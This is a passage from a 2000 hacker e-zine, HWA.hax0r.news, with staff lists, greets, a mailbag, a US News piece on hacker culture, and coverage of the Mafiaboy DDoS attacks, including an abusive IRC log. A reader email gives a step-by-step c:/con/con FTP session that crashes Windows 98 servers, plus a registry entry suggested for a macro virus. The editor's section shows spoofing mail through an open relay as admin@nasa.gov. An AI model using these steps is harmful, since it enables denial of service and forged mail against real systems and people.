             preferably one that has some scenery from your place of 
             residence for my collection, I collect stamps too so you kill
             two birds with one stone by being cool and mailing in a postcard,
             return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) 
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    
    Stuff you can email:
    
    - Prank phone calls in .ram or .mp* format
    - Fone tones and security announcements from PBX's etc
    - fun shit you sampled off yer scanner 
    - reserved for one smiley face ->        :-)            <-
    - PHACV lists of files that you have or phac cd's you own (we have a burner)
    - burns of phac cds (email first to make sure we don't already have em)
    - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc 
    

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: cruciphux@dok.org                                                                   
    Private email to editor.....: cruciphux@dok.org                                                                   
    Distribution/Website........: sas2@usa.net       
    
    Other methods:
    
    Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use 
    for lame questions!
    My Preffered chat method: IRC Efnet in #HWA.hax0r.news

    @HWA
    
    

00.2 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondants/affiliate members (Active)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       Zym0t1c ..........................: Dutch/Germany/Europe
       Sla5h.............................: Croatia
       Spikeman .........................: World Media/IRC channel enforcer
       HWA members ......................: World Media
       Armour (armour@halcon.com.au).....: Australia 
       Wyze1.............................: South Africa
       Xistence..........................: German/Dutch translations
       
      
      
      Past Foreign Correspondants (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form.Unless you count 
       paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent 
       news events its a good idea to check out issue #1 at least and possibly 
       also the Xmas 99 issue for a good feel of what we're all about otherwise 
       enjoy - Ed ...


    @HWA



 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.
     
     
     New members/affiliates
     
     Xistence      .....        General news and Dutch/German translations
     
     sP|a|Zm       .....        Swedish news / translations
     
     SugarKing     .....        General news articles


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair     _NeM_     
     D----Y         Dicentra            vexxation     sAs*
     Spikeman       p0lix               Vortexia      Wyze1     
     Pneuma         Raven               Zym0t1c       duro     
     Repluzer       astral              BHZ           ScrewUp     
     Qubik          gov-boi             _Jeezus_      Haze_     
     thedeuce       ytcracker           loophole      BlkOps     
     MostHated      vetesgirl           Slash         bob-
     CHEVY*         Debris              pr1zm         JimJones 
     Dragos Ruiu    pr0xy               MR^CHAOS      Eckis   
     Fuqrag         Messiah             v00d00        meliksah
     dinkee         omnihil             sP|a|Zm       OE
     KillNow        iPulse              erikR         prizm
     paluka         Xistence            doobee        phold hi ;)
     
     Folks from #hwa.hax0r,news and other leet secret channels,
     *grin* - mad props! ... ;-)
     
     And many others, sorry if i missed you or forgot you! mail
     me and i'll flail myself unforgivingly in front of my open
     bedroom window until I bleed, then maybe, add u to the list 
     (please, don't ask for pics...)
     
     Also mad props to doobee and the CCC (Chaos Computer Club)
     in Germany for setting up a new listserv system to help
     distribute the zine. (Will be in action soon, I have admin
     work to do first and testruns..).
     
     :-)))
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
     
     SpaceRogue for running a kick ass news net 
     
     Emmanuel Goldstein for pure staying power
     
     All the crackers, hackers and phreakers 
     
     The sysadmins, NOC controllers, network engineers
     IRCops, security professionals, tiger team operatives
     military cyberwar grunts, feds and 'special computer
     unit' coppers trying to keep shit together in this
     anarchic chaos.
          
     AND
     
     Kevin Mitnick (free at last, stay free this time man...)
     
     Kevin was released from federal prison on January 21st 2000
     for more information on his story visit http://www.freekevin.com/
     
     Recently reported 'helping' out the feds with security advice!
     
       
     
     
     kewl sites:
     
     + http://hackdesk.dhs.org/  NEW -> NEWBIE help + MORE
     + http://www.hack.co.za  NEW -> ** BACK ONLINE AS OF FEB 22ND **
       EfNet channel: #darknet    
                              
                                        
     + http://blacksun.box.sk. 
     + http://packetstorm.securify.com/ 
     + http://www.securityportal.com/ 
     + http://www.securityfocus.com/ 
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://www.pure-security.net/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
          
                _   _                   ____        _
               | \ | | _____      _____| __ ) _   _| |_ ___ ___
               |  \| |/ _ \ \ /\ / / __|  _ \| | | | __/ _ Y __|
               | |\  |  __/\ V  V /\__ \ |_) | |_| | ||  __|__ \
               |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
                                              |___/

      
      

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
         
         
         
         Since we provide only the links in this section, be prepared
         for 404's - Ed        
         

    +++ When was the last time you backed up your important data?
    
          
     
      Thanks to myself for providing the info from my wired news feed and
      others from whatever sources, Zym0t1c and also to Spikeman for sending
      in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      *** NEW WEB BOARD! ***
      
      ========================================================================
      
      The message board has been REVIVED with a new script and is doing quite
      well. Check it out
      
      
      http://discserver.snap.com/Indices/103991.html
      .      
      
      Don't be shy with your email, we do get mail, just not much of it 
      directed to other readers/the general readership. I'd really like to
      see a 'readers mail' section. Send in questions on security, hacking
      IDS, general tech questions or observations etc, hell we've even
      printed poetry in the past when we thought it was good enough to 
      share.. - Ed      
      
      =======================================================================
      
     
     From the Web board:
     
     Spies in the wires?
     ~~~~~~~~~~~~~~~~~~~
     
     Dissenter
     MILITARY SPYING?
     Fri Feb 25 08:10:56 2000


     I was surfing the net etc and noticed a connection
     on ports 1183, 1184, 1187 and 1188

     All from rbpki107.chamb.disa.mil

     I had visited sites like www.hack.co.za and
     www.pure-security.net ... coincidence?? 

     and WTF are these ports?? they don't show up in
     my /etc/services list.

     Dissenter
     
     -=-
     
     More spies in the wires?? (Aureate fiasco)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     TRDonJuan
     Advertising, reason for Spying?
     Sun Feb 27 10:39:02 2000


     http://www.freebox.com/zor/acid.txt
     http://www.freebox.com/zor/aureate.txt

     Check the two text files in the order i posted them.

     TRDonJuan
     
     -=-
     
     -=- email -=-
     
     
     
      From: Zoa_Chien <zoa_chien@??????.com>
      To: <cruciphux@dok.org>
      Sent: Friday, March 03, 2000 1:26 PM
      Subject: major security flaw in windoze 98
      
      
      New exploit found by the securax crew on 3/3/error (version 3)
      
      for: windoze 98 an probably 95 too...
      not for NT4 or win2K
      
      When we looked at the new exploit for ie that uses the image c:/con/con
      (http://www.zoomnet.net/~quick/error/crash.html)
      
      we experimented a bit with that unexisting path.
      We found that any program in windows 98 will crash if you try to open that 
      file.
      eg: try Start --> run --> c:/con/con
      or open in Word the non-existing document c:/con/con
      both attempts will result in en Blues Screen of death and a lockup.
       
       
      This can also be exploited to crash remote servers
      Look what we tryed on this servU-FTP v 2.4a
      (works on any windoze 98 FTP even with anonyous or guest account)
      
      it looked something like this:
      
      230 user logged in, proceed
      SYST
      215 UNIX TYPE:L8
      connect ok!
      PWD
      257 "c:/home" is current directory.
      haal directory op
      TYPE A
      200 Type set to A.
      PORT xx.xx.xx.xx :-)
      200 PORT Command succesful
      LIST
      150 Opening ASCII mode data connect
      Download: 86 bytes
      Wacht op de server
      226 transfer complete
      CDUP
      250 directory changed to /c:/
      PWD
      250 "/c:/" is current directory
      CWD /con/con --> this does the trick
      
      ...
      no more response :-)  server crashed.
       
       
      This is probably just the beginning of a new series of exploits for windoze.
      also vulnerable :
       
      samba server requires some programming NOT TESTED YET
      http server TESTED with www.server.com/con/con
      we tried to fake a dcc send with the name "con/con" in irc but it didn't 
      work due to the "/"
      (maybe if someone tries "%47" instead of "/")
       
       
      this little flaw could easily be used in a macro virus. may even be placed 
      in the registry to annoy people
       
      HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
      c:\con\con "%1" %*
       
       
      Da G#Df@RTER & Pathos (securax)
       
      www.securax.org
      
      -=-
      
       
     
          
     

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~
      
                        _____    _ _ _             _
                       | ____|__| (_) |_ ___  _ __( )__
                       |  _| / _` | | __/ _ \| '__|/ __|
                       | |__| (_| | | || (_) | |   \__ \
                    ___|_____\__,_|_|\__\___/|_|   |___/
                   / ___|  ___   __ _ _ __ | |__   _____  __
                   \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
                    ___) | (_) | (_| | |_) | |_) | (_) >  <
                   |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
                                     |_|

      

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

         /* Where have we been? life and personal problems.
          * now passed. Working towards re-establishing
          * equilibrium and peace in our processes...
          *
          * Possible partnership with the IBT team on the horizon          
          * also CCC has kindly offered listserver resources to
          * distribute the zine directly to subscribed members
          * thanks to doobee and the world renowned Chaos Computer
          * Club in Germany. 
          * 
          * "danke meine CCC-Freunde vom HWA-Personal!"
          *
          * Cruci
          *
          * cruciphux@dok.org
          * Preffered chat method: IRC Efnet in #HWA.hax0r.news
          *
          */
           
     printf ("EoF.\n");
           }
           
           
           
           
      Snailmail:
            
            HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5     
	    
	    
      Anonymous email:
      
      telnet (wingate ip) (see our proxies list)
      Wingate>0.0.0.0
      Trying 0.0.0.0...
      Connected to target.host.edu
      Escape character is '^]'.
      220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
      HELO bogus.com
      250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
      MAIL FROM: admin@nasa.gov
      250 admin@nasa.gov... Sender ok
      RCPT TO: cruciphux@dok.org
      250 cruciphux@dok.org... Recipient ok
      DATA
      Secret cool infoz
      .
      QUIT
      
      If you got that far everything is probably ok, otherwise you might see
      550 cruciphux@dok.org... Relaying denied
      
      or
      
      550 admin@nasa.gov... Domain must exist
      
      etc.
      
      
      
      * This won't work on a server with up to date rule sets denying relaying and your
        attempts will be logged so we don't suggest you actually use this method to
        reach us, its probably also illegal (theft of service) so, don't do it. ;-)
        
      -=-     

      

      Congrats, thanks, articles, news submissions and kudos to us at the
         
      main address: cruciphux@dok.org complaints and all nastygrams and
         
      mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
      or ol' papasmurfs to  127.0.0.1, 
      
      private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      
      
      
     
03.0 Who are Hackers anyway?
     ~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.usnews.com:80/usnews/issue/990614/14blac.htm
     
     Business & Technology  6/14/99
     
     
     SPECIAL REPORT
     
     Who are hackers, anyway?
     
     The computer underground says that it is misunderstood
     
     BY BRENDAN I. KOERNER
     
     Hacker. 
     
     The very word conjures up images of nihilistic teenagers hellbent on 
     destruction of reckless, restive nerds just one keystroke away from 
     starting World War III. To hear the hackers themselves tell it, however,
     nothing could be further from the truth.
     
     True, there are bad-seed "crackers" among their ranks. But members of 
     the computer underground dismiss the negative stereotypes as the lies 
     of a pandering media. Instead, they claim that true hackers are interested
     not in destruction but in technology, and that they circumvent security only
     to help improve it. "People say hackers want to destroy networks," says 
     "mosthated," who was rousted by the FBI over Memorial Day weekend. "But 
     most people do it for knowledge. It's for the fun."
     
     In his own hacking career, mosthated claims to have carefully followed the
     community's famed ethic, which frowns upon needless defacements and network
     trashing. Instead, he leaves notes for system administrators, detailing their
     holes. "We broke into a site the summer of last year, and I left my E-mail 
     address," he says. "I helped the system administrator set up some mail 
     servers."
     
     No malicious intent. As a rule, hackers don't like crackers. In fact, the 
     group that recently defaced the White House Web page has been castigated by
     many peers. Mike McCloskey of Klein Associates, a research firm that has been
     commissioned by the U.S. military to study the psychology of hackers, concurs
     that most hackers lack malicious intent. "They have an inherent interest in 
     technology," he says. They are also motivated by ideals. "They don't like the
     idea that information is private," adds Terry Stanard, also of Klein Associates,
     echoing a crucial mantra of the underground: "Information wants to be free."
     
     But the temptation to play King of the Cybermountain sometimes pushes people to
     cross the blurry boundary between hacker and cracker. "A lot of what they do is
     to get the attention of the press or to get the attention of their peer group,"
     continues Stanard. "It's almost like a popularity contest that you encounter in
     grade school." If that means taking down a heavy-traffic site and posting 
     profanity-laced diatribes, or downloading files from NASA, so be it.
     
     There is certainly a rush associated with infiltrating sites and servers. 
     "It's sort of an addictive thing," says McCloskey. "You can hack into a 
     high-level site and put in a back door, and you get more and more access."
     That addiction can become all encompassing for some. "LoopHole," another 
     target of the FBI raids, knows of many who become hopelessly obsessed, 
     dedicating every hour of every day to the pursuit of access. 
     "That's all they do," says LoopHole, who claims membership in the 
     underground group "Hydro hoax programmers."
     
     A number of hackers underachieve in school, something they often blame on 
     curricula that don't cater to their unique interests. "A lot of people drop out,
     'cause there's really nothing you can learn in school," says mosthated, 
     a dropout himself. "At my school, they only had two computer classes, and one
     was learning databases."
     
     By the time they reach adulthood, many hackers fantasize about going legit,
     turning their years of practice into healthy salaries as systems 
     administrators or security advisers. Mosthated, for example, has a job 
     offer, the chance to do remote security for a small Internet service 
     provider in Denver; he's also got his heart set on designing his own 
     network with the aid of a programmer in Belgium.
     
     Of course, not all hackers end up in corporate cubicles. Tempted by 
     businesses offering cash in exchange for stolen information, some of
     them are going over to the dark side. "There are people out there who do
     hacking for hire," admits mosthated, who says everyone on the Internet is
     talking about a few individuals who have offered big bucks in exchange for
     proprietary secrets.
     
     Yet financial gain is rarely on the mind of hackers, many of whom are too
     young to dream of purchasing anything grander than a compact disk. Boredom
     is the enemy, and in the era of the two-computer family, hacking is the 
     answer. "A lot of these kids are 14, 15, 16 years old," says Mike Hudack,
     editor of Aviary-mag.com. "They don't have anything else to do." To the 
     companies whose sites get trashed in the course of curing that boredom, 
     however, "harmless" and "hacker" are mutually exclusive terms.
     
     @HWA
     


04.0 Mr DoS: Mafiaboy isn't done baring his teeth (Vetesgirl) & ABC
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Info and article snarfed from Vetesgirl's site
     http://www.self-evident.com/
     
     Also includes an article from ABCNews.
     http://www.abcnews.go.com/sections/tech/DailyNews/webattacks000217.html       
     
     -=- 80 col mode formatting turned off to post this data raw -=-
     
     
     MafiaBoy Attacks Vetesgirls site after article on him appears there:
     
     
     I was dos'd my nick was bot'd on www.titanicpussy.com by mafiaboy/anon 
     he then down'd www.self-evident.com for 8 hours. this is a log of him 
     talking to me before i was attacked. 
     ------------------------------------------------------------ 
     MSG 02/13/00 at 09:57:47 PM anon (anonymous@s86-73.resnet.u cla.edu) just
     MSG 02/13/00 at 09:57:49 PM anon (anonymous@s86-73.resnet.u cla.edu) who do you think you are
     MSG 02/13/00 at 09:57:51 PM anon (anonymous@s86-73.resnet.u cla.edu) putting my name
     MSG 02/13/00 at 09:57:53 PM anon (anonymous@s86-73.resnet.u cla.edu) on your fucking webpage
     MSG 02/13/00 at 09:58:47 PM anon (anonymous@s86-73.resnet.u cla.edu) mafiaboy
     MSG 02/13/00 at 09:59:07 PM anon (anonymous@s86-73.resnet.u cla.edu) you think your fucking cool or something
     MSG 02/13/00 at 09:59:25 PM anon (anonymous@s86-73.resnet.u cla.edu) fucking posting my name abouts
     MSG 02/13/00 at 09:59:27 PM anon (anonymous@s86-73.resnet.u cla.edu) something serious
     MSG 02/13/00 at 09:59:29 PM anon (anonymous@s86-73.resnet.u cla.edu) yah you dumb whore
     MSG 02/13/00 at 09:59:41 PM anon (anonymous@s86-73.resnet.u cla.edu) no im gonna continue
     MSG 02/13/00 at 09:59:45 PM anon (anonymous@s86-73.resnet.u cla.edu) by hitting your fucking page
     MSG 02/13/00 at 09:59:49 PM anon (anonymous@s86-73.resnet.u cla.edu) dont fucking put it on a website
     MSG 02/13/00 at 10:00:24 PM anon (anonymous@s86-73.resnet.u cla.edu) you dumb whore
     MSG 02/13/00 at 10:00:31 PM anon (anonymous@s86-73.resnet.u cla.edu) fucking trying to get me into trouble
     MSG 02/13/00 at 10:01:47 PM anon (anonymous@s86-73.resnet.u cla.edu) this is the real mafiaboy
     MSG 02/13/00 at 10:01:49 PM anon (anonymous@s86-73.resnet.u cla.edu) believe me
     MSG 02/13/00 at 10:03:29 PM anon (anonymous@s86-73.resnet.u cla.edu) if www.nasa.gov
     MSG 02/13/00 at 10:03:31 PM anon (anonymous@s86-73.resnet.u cla.edu) thinks your packeting them
     MSG 02/13/00 at 10:03:41 PM anon (anonymous@s86-73.resnet.u cla.edu) have a nice day
     MSG 02/13/00 at 10:04:27 PM anon (anonymous@s86-73.resnet.u cla.edu) all you can do
     MSG 02/13/00 at 10:04:29 PM anon (anonymous@s86-73.resnet.u cla.edu) is fucking email
     MSG 02/13/00 at 10:06:21 PM anon (anonymous@s86-73.resnet.u cla.edu) like i care what u call "real hackers"
     MSG 02/13/00 at 10:06:29 PM anon (anonymous@s86-73.resnet.u cla.edu) thats why i get msged everyday
     MSG 02/13/00 at 10:06:37 PM anon (anonymous@s86-73.resnet.u cla.edu) from every fucking hacker on efnet
     MSG 02/13/00 at 10:07:35 PM anon (anonymous@s86-73.resnet.u cla.edu) AND IM TELLING YOU
     MSG 02/13/00 at 10:07:43 PM anon (anonymous@s86-73.resnet.u cla.edu) I AM D O S I N G YOUR WEBPAGE
     MSG 02/13/00 at 10:07:45 PM anon (anonymous@s86-73.resnet.u cla.edu) TO THE SHITS
     MSG 02/13/00 at 10:07:57 PM anon (anonymous@s86-73.resnet.u cla.edu) just
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) who do you think you are
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) putting my name
     MSG 02/13/00 at 10:07:59 PM anon (anonymous@s86-73.resnet.u cla.edu) on your fucking webpage
     MSG 02/13/00 at 10:10:43 PM anon (anonymous@s86-73.resnet.u cla.edu) fuck ur gay ass site
     MSG 02/13/00 at 10:13:45 PM anon (anonymous@s86-73.resnet.u cla.edu) i have respect
     MSG 02/13/00 at 10:13:45 PM anon (anonymous@s86-73.resnet.u cla.edu) u have none     
     
     -=- 80 col mode returns -=-

     

     MafiaBoy  by VetesGirl
     ~~~~~~~~~~~~~~~~~~~~~~
     
     Mafiaboy attacked self-evident due to this article we were down 8 hours, here is
     what he said before the attack after the attack I recieved logs of mafiaboy in #!tnt 
     RCMP has the real name and address of mafiaboy it was on Toronoto Radio this
     morning and they proably already have him in custody. A friend of mine who has
     close ties to the FBI passed the info on to them about mafiaboy. I know HNN was
     not interested in this story and said  This is what I think [12:55] [anon] what can irc
     prove[12:55] [anon] i can be bluffing - HNN  I replied bluffing = 8 hours of down
     time oh okay... I could care less about it getting published I was just wanting you to 
     know mafiaboy was capable of the attack and that I have known mafiaboy for years.
     Wasn't it mitnick or poulsen who was tracked  with irc?  I was surprised that HNN
     didn't know that Mitnick was tracked on irc that was one of  Mitnicks unusual tools .
     GayPee at antionline.org got some publicity and as always his information was
     incorrect. I don't know where gaypee gets his info but its not a good source. People
     who know mafiaboy does know he was capable of it and was behind some of the
     attacks. Even the fbi believes it was Mafiaboy and so do Canada authorities. Wired
     News did a lot of investigating and did many follow ups and has the most accurate
     news, they did not discard any statement they received.  Mafiaboy was dumb
     enough to go from person to person on efnet bragging about how he took this and
     that server down and also had a channel asking users to give him fast servers so he
     could show off and take the servers down, with  the Feds watching him he had the
     nerve to DoS me go to a hacked shelled titanicpussy.com and bot my nick there and
     then he attacked Self-Evident for 8 hours. Mafiaboy should have known he had a lot
     of enemies on irc  because of his attacks on them and that his real name and address
     were easy to get because he was Legit once http://www.dsuper.net/~mafiaboy was
     one of his legit accounts. Mafiaboy is caught up in getting recognition and in my
     opinion is a Packet Warrior who used Remote Exploits to gain entry and then use
     that server for DoS/Bot/Bnc. Last year he was begging for shells and didn't even
     know how to find suids on a box, he may have learnt more since then but I seriously
     doubt it, He liked being on Efnet showing off his packet skills, taking channels and
     terrorizing those who would NOT bow down to him, much like bionic except bionic
     had more skill than him.. Self-Evident was attacked because of this article -
     Mafiaboy who is a member of tnt on efnet #exceed, #shells, #carding, #!tnt is
     claiming he was the one behind the attacks on ebay, yahoo and Amazone.com. 
     Mshadow stated he has logs of it all and confirmed it was Mafiaboy.  Hackers and
     Security Pros have said the people behind this are NOT hackers and are proably
     socially retarded, with a need to control others much like the shooters of Columbine
     High school.      
     
     
     -=-
     
     (Sorry for nasty formatting, it looks awful without manually re-writing it 
     and I'm not going to do that, started but, gave up .... - Ed)
     
         
     
      ABCNews:

      http://www.abcnews.go.com/sections/tech/DailyNews/webattacks000217.html       
      (Link has video clip available for this story also. - Ed)

      Mafiaboy       
      Suspected 

 
      FBI Has Evidence That He and Others Launched Web Attacks, Expert Says 

      Sen. Patrick Leahy, D-Vt., left, and Sen.  Judd Gregg, R-N.H., question       
      FBI Director Louis Freeh and Attorney General Janet Reno during a hearing 
      on federal law enforcement efforts to track down the culprits who 
      sabotaged several leading Web sites. (J. Scott Applewhite/AP Photo)

 

 

     By Jonathan Dube

     Feb. 17  A hacker who calls himselfmafiaboy is believed to be responsible      
     for at least two of the attacks on leading Web sites, a security expert 
     tells ABCNEWS.com. Chat room logs now in the possession of the FBI show 
     that mafiaboy asked others what sites he should take down before the sites 
     were attacked, Internet security expert Michael Lyle said. 

      In a later conversation with Lyle, mafiaboy claimed credit for attacking      
      CNN.com, E*TRADE and several  smaller sites, and he shared technical 
      information that only someone involved in the attacks would know, Lyle 
      said. 

          The FBI now has reason to believe that the attacks last week that      
          took down seven leading Web sites and at least six smaller Web sites 
          were launched by several people, acting independently. Mafiaboy, who 
          has been described as a 15-year-old Canadian, is believed to be a 
          copycat who launched his attacks only after Yahoo! was knocked offline 
          on Feb. 7. 

     Mafiaboys Claims Seem Credible

     Dozens of hackers have claimed credit for the attacks in      online chats, 
     but Lyle says mafiaboy is the only one so far who appears to be credible. 

          Mafiaboy was saying What should I hit next? What should I hit      
          next? and people on the channel were suggesting sites, and mafiaboy 
          was saying, OK, CNN, said Lyle, the chief technology officer for 
          Recourse Technologies Inc., an Internet security company in Palo Alto, 
          Calif. And shortly thereafter the people on the channel would be 
          talking about CNN going down. If you look at the time stamps on the 
          logs, they also coincide with CNN going down.

      
          Lyle said the log files show similar discussions prior to the Feb. 9 
          attacks on E*TRADE and several other smaller sites. 

          Chat room log files can be faked, but Lyle said hes spoken with      
          a number of others who witnessed the conversations live and verified 
          their authenticity. 

     Mafiaboy Knows Details      Moreover, Lyle said he spoke with mafiaboy over 
     the Internet last Thursday and again last Friday and those conversations 
     bolstered the evidence against the young hacker. Mafiaboy also said he was 
     breaking into computers that were using a program called WUFTP, which is 
     often used to exchange data on university computers, Lyle said. Mafiaboy 
     said these computers were using an old version of WUFTP that had security 
     flaws in it and thus he was able to install the attack software on the 
     computers, Lyle said. He is believed to have installed attack software 
     called Tribal Flood Network, or TFN, on dozens of computers, making them 
     into zombies that he could then instruct to launch the attacks. Lyle said 
     mafiaboy told him specific details about the ports that he used to connect 
     with the zombie computers and launch the attacks  information that only 
     someone involved in the attack would know. 

     More Than One Attacker      The reason investigators believe different 
     culprits were responsible for some of the attacks is that the software 
     tools used to launch the attacks on Yahoo! and eBay were different than 
     those used to attack CNN.com and E*TRADE, Lyle said. The attacks on CNN.com 
     and E*TRADE are believed to have been launched using TFN, a software 
     program thats widely available on the Internet. The attacks on Yahoo! and 
     eBay were launched using a more sophisticated set of tools, he said. 
     Toronto-based Internet service provider Internet Direct said the Royal 
     Canadian Mounted Police had warned it that a subscriber called mafiaboy 
     previously held two accounts with Delphi Supernet, a Montreal ISP the 
     company bought last year. The accounts were closed in March 1998 because 
     mafiaboy violated subscriber policies, but Internet Direct would not say 
     what the violations entailed. Lyle says he has turned his information over 
     to the FBI and has been working with investigators. Based on his 
     conversations with mafiaboy, Lyle said the teen likely committed the 
     attacks to boost his notoriety within the hacker community. Theres this 
     real effort among the people on all these channels to try and stand out and 
     look like the best hacker, or one of the best, Lyle said. And I think 
     that thats what he was searching after. That really explains why he would 
     brag the way he did about it. 

     FBI Interviews Coolio      ABCNEWS has also learned that the FBI has 
     interviewed a hacker called coolio in connection with last weeks Web 
     attacks, but he denied any involvement. FBI officials told ABCNEWS Brian 
     Ross they had tracked down the teenage hacker in Southern California 
     because they believed he might have useful information for their 
     investigation. Coolio is well known to authorities as a member of Global 
     Hell, a group of teenagers who have hacked into White House and Department 
     of Defense computer systems. The officials said members of Global Hell are 
     still under investigation in connection with last weeks Web attacks. The 
     FBI also wants to question a hacker known as nachoman. Officials have 
     been careful to say they are not suspects, but just want to talk to them 
     about important information relating to the attacks. 

     Fast-Developing Leads      In Washington, FBI Director Louis Freeh said 
     investigators are running down hundreds of leads related to the Web 
     attacks, but still face substantial hurdles. There are fast developing 
     leads as we speak, Freeh told a Senate subcommittee. Freeh said the 
     investigation has led the FBI to at least four other countries, including 
     Canada and Germany. He also said FBI field offices in five cities are 
     participating in the investigation: Los Angeles, San Francisco, Atlanta, 
     Boston and Seattle. The FBI began investigating after leading Web portal 
     Yahoo! was attacked and made inaccessible for several hours on Feb. 7. 
     Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And 
     on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered 
     attacks. As many as 13 Web sites may have been attacked. Known as 
     denial-of-service attacks, the assaults effectively overloaded Web sites 
     with mock traffic so that real users couldnt access the sites. The 
     culprits took over computers in various parts of the world and used them to 
     bombard the victims sites with data. Investigators have located more than 
     a half-dozen computers used in last weeks attacks. Computers at two 
     California universities, a Midwestern school, a Berlin university, a 
     non-university site in Southern California, a home business in Oregon, and 
     machines at least four companies were used as zombies. 

 
     EPA Shuts Down Web Site The U.S. Environmental Protection Agency Thursday 
     said it had shut down its Web site for fear of computer hacker attacks 
     after security deficiencies were made public this week. EPA said the site, 
     accessed millions of times over the course of any given month, will be down 
     for a week or two until an ongoing security upgrade program is complete. 
     The agency has been working with the General Accounting Office (GAO) and 
     the office of Inspector General for several months to strengthen the 
